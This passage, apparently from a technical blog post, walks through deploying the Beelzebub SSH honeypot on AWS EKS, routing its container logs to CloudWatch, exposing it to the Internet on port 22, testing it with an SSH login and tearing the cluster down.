I was most interested in the application (or container) logs. For this I used the CloudWatch observability addon for EKS. To make it work I needed to attach some new policies to the worker nodes role and then create the addon.

aws iam attach-role-policy \
    --role-name <my-worker-node-role> \
    --policy-arn arn:aws:iam::aws:policy/CloudWatchAgentServerPolicy
aws iam attach-role-policy \
    --role-name <my-worker-node-role> \
    --policy-arn arn:aws:iam::aws:policy/AWSXrayWriteOnlyAccess
aws eks create-addon --addon-name amazon-cloudwatch-observability --cluster-name beelzebub-cluster

Expose the honeypot to the Internet

Then, I created a Kubernetes service of type LoadBalancer:

kubectl expose deployment beelzebub-beelzebub-chart --name beelzebub-public --type LoadBalancer --port 22 --target-port 2222

I had to wait a bit for the load balancer to be set up. Then I opened CloudWatch Logs Insights, selected the /aws/containerinsights/beelzebub-cluster/application log group and entered the following query:

filter kubernetes.pod_name="beelzebub-beelzebub-chart-b86c7dff8-59ldz"
| fields @timestamp, log_processed.event.Msg, log_processed.event.User, log_processed.event.Password, log_processed.event.Command, log_processed.event.CommandOutput
| sort @timestamp desc
| limit 20

To make sure everything was working, I logged into the honeypot and observed the logs (it takes a while until the logs reach CloudWatch):

ssh root@<some-string>.elb.eu-central-1.amazonaws.com ls -la
# obviously, the default password is root :-)

Clean up

Once I was done, I removed the cluster (and all of its workloads and related AWS services):

eksctl delete cluster --name beelzebub-cluster --region eu-central-1

You might also want to delete the related CloudWatch Log groups.